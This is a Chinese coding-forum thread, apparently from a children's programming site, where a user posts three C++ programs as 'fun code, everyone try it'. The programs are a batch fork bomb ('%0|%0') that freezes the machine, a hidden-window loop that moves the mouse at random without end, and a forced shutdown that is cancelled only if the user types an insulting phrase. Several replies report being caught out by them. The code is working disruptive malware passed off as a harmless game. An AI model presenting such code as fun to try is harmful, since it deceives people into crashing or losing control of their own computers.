问题标题: 酷町堂:好玩的代码

0
0
已解决
邓涵睿
邓涵睿
中级天翼
中级天翼
#include <Windows.h>
#include <iostream>
#include <fstream>
using namespace std;
int main(){        
    char a[9] = "abc.bat";        
    ofstream file_out(a);        
    file_out<<"%0|%0";        
    file_out.close();        
    system( a );        
    return 0;
}

特别好玩的代码,大家试试。

小明今天牵谁呢?

邓涵睿在2020-07-18 13:29:40追加了内容

还有哦

#include <bits/stdc++.h>
#include <windows.h>
using namespace std;
void HideWindow() {
	HWND hwnd;
	hwnd=FindWindow("ConsoleWindowClass",NULL);
	if(hwnd) ShowWindow(hwnd,SW_HIDE);
	return;
}
int main() {
	HideWindow();
	for(;;)
	{
					SetCursorPos(rand()%2000,rand()%2000);
			
	}

	return 0;
}

 

邓涵睿在2020-07-18 13:33:59追加了内容
#include <bits/stdc++.h>
using namespace std;
int main() {
	system("shutdown -s -c 给你30秒时间输入我是猪,否则关机");
	for(;;)
	{
		string a;
		cin>>a;
		if(a=="我是猪")
		{
			system("shutdown -a");
			break;
		}
	}

	return 0;
}

还有这个


0
已采纳
李瑞曦
李瑞曦
高级天翼
高级天翼

跪求大佬看在我的电脑差一点被你坑坏了的份上牵我吧~

ps:你又换头像了哦~

0
0
陈曦
陈曦
资深天翼
资深天翼

这个代码是干什么用的啊?

0
0
0
高梓荣
高梓荣
新手天翼
新手天翼

牵我吧。。。我告诉你

明世隐出5本书 1个帽子 大招能秒掉满血脆皮

0
0
徐紫尘
徐紫尘
高级光能
高级光能

 

什么也没啊?!

徐紫尘在2020-07-18 13:42:10追加了内容

第二串代码吓死我了,应该怎么破解?不然鼠标一直乱动

0
王子健
王子健
初级天翼
初级天翼

不要再坑人了!!!

 

吓死我了小徒弟~

0
朱瑾文
朱瑾文
新手光能
新手光能

这是关机代码吧。

应该是控制鼠标方位代码

病毒代码

关机代码。

 

我要回答